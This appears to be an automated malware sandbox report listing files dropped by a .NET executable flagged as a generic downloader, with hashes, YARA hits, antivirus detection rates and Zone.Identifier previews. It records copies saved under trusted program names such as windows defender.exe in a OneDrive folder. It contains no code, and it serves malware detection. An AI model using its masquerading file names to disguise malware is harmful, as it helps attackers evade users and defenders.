                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\google.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\internet explorer.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\java.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\jdownloader.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\microsoft office.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\microsoft.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\microsoft.net.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\mozilla maintenance service.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\msbuild.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\msecache.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\reference assemblies.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows defender.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows mail.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:true
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):213832
                                    Entropy (8bit):5.98628667033645
                                    Encrypted:false
                                    SSDEEP:6144:UbqlnFfmUszBnDo8zbKTYUDRpzX4A7dnWldUTYFF9i8WnI:j6dn2TYUDRpzX4A7dnWldUTYFF9i8WnI
                                    MD5:8391D3B5332C4B1164333DDCE388A8C7
                                    SHA1:B982FC92ED38565DEBF033B0FFAA2181A8CAA5E7
                                    SHA-256:E201E9A5C9FD3A68F54E2ADA061A242DF3ED813E56D2B09E2C8EFC04953C2F72
                                    SHA-512:F42B0EC317A534AF6239EC7BFB6FF22E4E3E8ABF0316B9A0666B073212F4BA6D989DDCE2D40D0EA460E85B245B8637B1801BBF6CA5DE9944171AF3134CCA2C96
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\OneDrive\windows media player.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 68%
                                    Process:C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
